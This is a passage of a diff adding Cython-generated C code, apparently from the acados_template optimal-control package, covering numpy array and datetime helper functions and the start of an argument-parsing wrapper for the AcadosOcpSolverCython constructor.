* cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + +static CYTHON_INLINE void __pyx_f_5numpy_set_array_base(PyArrayObject *__pyx_v_arr, PyObject *__pyx_v_base) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":971 + * + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! # <<<<<<<<<<<<<< + * PyArray_SetBaseObject(arr, base) + * + */ + Py_INCREF(__pyx_v_base); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":972 + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) # <<<<<<<<<<<<<< + * + * cdef inline object get_array_base(ndarray arr): + */ + (void)(PyArray_SetBaseObject(__pyx_v_arr, __pyx_v_base)); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_get_array_base(PyArrayObject *__pyx_v_arr) { + PyObject *__pyx_v_base; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("get_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":975 + * + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) # <<<<<<<<<<<<<< + * if base is NULL: + * return None + */ + __pyx_v_base = PyArray_BASE(__pyx_v_arr); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + __pyx_t_1 = (__pyx_v_base == NULL); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":977 + * base = PyArray_BASE(arr) + * if base is NULL: + * return None # <<<<<<<<<<<<<< + * return base + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":978 + * if base is NULL: + * return None + * return base # <<<<<<<<<<<<<< + * + * # Versions of the import_* functions which are more suitable for + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject *)__pyx_v_base)); + __pyx_r = ((PyObject *)__pyx_v_base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_array(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_array", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":984 + * cdef inline int import_array() except -1: + * try: + * __pyx_import_array() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") + */ + __pyx_t_4 = _import_array(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 984, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":985 + * try: + * __pyx_import_array() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.multiarray failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 985, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__9, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 986, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 986, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_umath(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_umath", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":990 + * cdef inline int import_umath() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 990, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":991 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 991, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__10, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 992, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 992, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_ufunc(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_ufunc", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":996 + * cdef inline int import_ufunc() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 996, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":997 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 997, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":998 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__10, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 998, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 998, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_timedelta64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_timedelta64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1013 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyTimedeltaArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyTimedeltaArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_datetime64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_datetime64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1028 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyDatetimeArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyDatetimeArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + +static CYTHON_INLINE npy_datetime __pyx_f_5numpy_get_datetime64_value(PyObject *__pyx_v_obj) { + npy_datetime __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1038 + * also needed. That can be found using `get_datetime64_unit`. + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyDatetimeScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + +static CYTHON_INLINE npy_timedelta __pyx_f_5numpy_get_timedelta64_value(PyObject *__pyx_v_obj) { + npy_timedelta __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1045 + * returns the int64 value underlying scalar numpy timedelta64 object + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyTimedeltaScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + +static CYTHON_INLINE NPY_DATETIMEUNIT __pyx_f_5numpy_get_datetime64_unit(PyObject *__pyx_v_obj) { + NPY_DATETIMEUNIT __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1052 + * returns the unit part of the dtype for a numpy datetime64 object. + * """ + * return (obj).obmeta.base # <<<<<<<<<<<<<< + */ + __pyx_r = ((NPY_DATETIMEUNIT)((PyDatetimeScalarObject *)__pyx_v_obj)->obmeta.base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":74 + * cdef str nlp_solver_type + * + * def __cinit__(self, model_name, nlp_solver_type, N): # <<<<<<<<<<<<<< + * + * self.solver_created = False + */ + +/* Python wrapper */ +static int __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_1__cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_model_name = 0; + PyObject *__pyx_v_nlp_solver_type = 0; + PyObject *__pyx_v_N = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_model_name,&__pyx_n_s_nlp_solver_type,&__pyx_n_s_N,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_model_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 74, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_nlp_solver_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 74, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 1); __PYX_ERR(0, 74, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_N)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 74, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, 2); __PYX_ERR(0, 74, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(0, 74, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + } + __pyx_v_model_name = values[0]; + __pyx_v_nlp_solver_type = values[1]; + __pyx_v_N = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 74, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython___cinit__(((struct 